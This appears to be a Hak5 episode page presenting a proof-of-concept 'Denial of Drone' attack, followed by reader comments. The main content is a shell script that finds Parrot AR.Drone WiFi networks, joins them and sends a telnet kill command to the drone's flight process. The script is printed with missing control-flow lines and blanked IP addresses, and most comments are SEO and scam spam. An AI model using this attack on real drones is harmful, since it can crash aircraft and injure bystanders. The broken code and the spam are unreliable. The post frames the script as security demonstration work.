Hak5 1518 – Drones Hacking Drones

Drone Hacking from an airborne WiFi Pineapple this time on Hak5.

Download HD | Download MP4

Youtube Hak5 1518.1: http://youtu.be/Fk1Bpy5ccPU
Youtube Hak5 1518.2: http://youtu.be/xKfY0PmKDRE

Drone Hacking from an airborne WiFi Pineapple – this time on Hak5. Darren demonstrates his proof of concept “Denial of Drone” attack targeting the Parrot AR.Drone from a WiFi Pineapple equipped DJI Phantom 2 Vision. Inspired by Sammy Kamkar’s Raspberry Pi based Skyjacking demo, this drone killer PoC takes a backdoor approach without the need to deauth clients.

Here’s the quick and dirty shell script. The only dependency is “empty” – a TCL/expect clone that uses stdin/out for process automation.

#dronepwn.sh version 0.1 by Darren Kitchen – absolutely horrible code. Do not use under any circumstance. Send all flame mail to hak5.wpengine.com

while true; do
if ! ( iw wlan0 scan | grep SSID | awk ‘{print $2}’ | grep [a]rdrone ); then
echo “No Drones Found”
echo “Drone Found! Attempting to connect”
DRONESSID=`iw wlan0 scan | grep SSID | awk ‘{print $2}’ | grep [a]rdrone`
iwconfig wlan1 essid $DRONESSID
sleep 2

echo “Testing Wireless Association”
if ! ( iwconfig wlan1 | grep $DRONESSID ); then
echo “Association to $DRONESSID failed”
echo “Association to $DRONESSID successful”

echo “Setting Static IP Address”
ifconfig wlan1 netmask up
sleep 2

echo “Testing IP Connection”
if ! ( ping -c1 | grep from ); then
echo “IP Connection Failed”
echo “IP Connection Successful”
echo “Connecting to Telnet and sending kill command. Banzai!”
empty -f -i /tmp/drone_input.fifo -o /tmp/drone_output.fifo -p /tmp/drone_empty.pid telnet
empty -w -i /tmp/drone_output.fifo -o /tmp/drone_input.fifo BusyBox “kill -KILL \`pidof program.elf\`\n”
kill `pidof empty`
echo “”
echo “Kill command sent. Splash one drone”
echo “”


sleep 60


  • Jack K.

    W O W !
    You folks have out done you selves.
    This is ssooooo HOT!
    I can not wait to see what is next.


  • Nick Landry

    Think about this….. respawner must be killed first as to guarantee that the process is dead before it is even killed.

    Love the show.

  • FranciscoXTubb

    Can I simply just say what a comfort to uncover a person that actually knows what they’re discussing on the internet.
    You definitely know how to bring an issue to light and make
    it important. A lot more people really need to read this and understand this side of the story.
    I was surprised that you are not more popular because you definitely
    have the gift.

  • MeaganSBedillion

    Howdy would you mind letting me know which hosting company you’re utilizing?

    I’ve loaded your blog in 3 different web browsers and I must
    say this blog loads a lot quicker then most. Can you suggest a good web hosting provider at a
    honest price? Thanks a lot, I appreciate it!

  • Lilia

    Ve?y gr?at post. I simply stumblerd ?pon your blog
    andd wished too say that I have really enjoyed browsing ?o?r weblog p?sts.
    After all I will be ?ubscribing for your feed and I am hoping you write again very ?oon!

  • can dieting affect my period

    This is fairly good should you be accustomed to eating large portions as you will see
    that consume less. Because there isn’t any scientific proof
    that it’ll help burn away your fat, you need to are the judge of if the truth is any actual
    advantages from applying this all natural remedy. This is why
    it will always be better to your blood glucose levels level,
    and your health in general, you can eat sensibly and well instead of starving yourself.

  • DaniaSMontieth

    What’s Taking place i’m new to this, I stumbled upon this I’ve found It positively
    useful and it has helped me out loads. I hope to contribute &
    help other users like its aided me. Good job.

  • wifi hacker Program free download

    For instance, the ‘hotspot’ for connecting online could have been build by a thief
    as being a spider in the web looking forward to flies.
    I’m sure it’s going to be appropriate for Windows 8 as well.
    unsecured) wi-fi network, such as a free wireless hotspot or perhaps a neighbors unsecured network,
    it might connect automatically without informing you.

  • wifi cracker iphone

    Make security personal to them by ensuring that they realize that if your company is hit with a massive lawsuit as
    a result of sloppy employee password security, that their livelihood is incredibly much on the line.

    The average car has a lot more than 100 million lines of code with no security trail.

    A group of Droid hacks allow us that decrease the connection.

  • freeitunescodes.club

    Target isn’t offering a rebate on the cards this week and Walmart
    commonly has a significant offer on Cyber Monday, but that is incorrect this year.
    The notion we have discovered about great marriages around the
    globe will be the essence of great love – 2 different people in love join together
    in order to create one without losing their individual identities.
    On August 24, Steve Jobs made the globe shocked after announcing his
    decision to resign as Apple’s CEO as a result of health
    conditions and Tim Cook took over his position.

  • hack fb

    I blog quite often and I seriously thank you for your content.
    This great article has really peaked my interest. I am going to book mark your blog and keep checking for new details about once per week.
    I opted in for your RSS feed too.

  • Pingback: Drone/car/pacemaker hacking and GSM sniffing. | Laborious's Blog

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>